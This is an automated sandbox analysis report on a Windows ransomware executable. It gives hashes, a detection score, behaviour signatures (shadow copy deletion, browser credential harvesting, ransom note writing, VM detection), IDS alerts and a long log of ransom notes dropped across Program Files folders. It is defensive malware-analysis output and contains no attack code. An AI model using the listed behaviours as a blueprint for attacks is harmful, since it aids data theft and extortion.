Edit tour

Windows Analysis Report
2b7cu0KwZl.exe

Overview

General Information

Sample name:	2b7cu0KwZl.exe renamed because original name is a hash value
Original sample name:	e21cbdbf6414ffc0ef4175295c7e188800a66b7b83302bd35b7e3fd6fabfccde.exe
Analysis ID:	1548500
MD5:	0d7e80ec85db5cb45642235cb2381a0c
SHA1:	f0a15a7ecaff7d0659bab2a416e5d668ff67724e
SHA256:	e21cbdbf6414ffc0ef4175295c7e188800a66b7b83302bd35b7e3fd6fabfccde
Tags:	193-143-1-139exeuser-JAMESWT_MHT
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Deletes shadow drive data (may be related to ransomware)

Found Tor onion address

Infects executable files (exe, dll, sys, html)

Modifies existing user documents (likely ransomware behavior)

Query firmware table information (likely to detect VMs)

Tries to harvest and steal browser information (history, passwords, etc)

Writes a notice file (html or txt) to demand a ransom

Writes many files with high entropy

Abnormal high CPU Usage

Enables debug privileges

IP address seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

2b7cu0KwZl.exe (PID: 7408 cmdline: "C:\Users\user\Desktop\2b7cu0KwZl.exe" MD5: 0D7E80EC85DB5CB45642235CB2381A0C)

cleanup

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T15:30:23.184562+0100	2022930	1	A Network Trojan was detected	4.175.87.197	443	192.168.2.4	49737	TCP
2024-11-04T15:31:03.850449+0100	2022930	1	A Network Trojan was detected	4.175.87.197	443	192.168.2.4	49766	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 2b7cu0KwZl.exe

ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Source: 2b7cu0KwZl.exe, 00000000.00000000.1714039454.00007FF746C93000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: -----BEGIN RSA PUBLIC KEY-----

memstr_fd6dd842-c

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\7-Zip\Lang\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\7-Zip\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\CAN\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\DEU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\FRA\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\JPN\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\UK\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\en_US\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prc\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\private\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\prod\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\stage\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\fonts\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\hi_contrast\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\hi_contrast\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app-api\dev\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
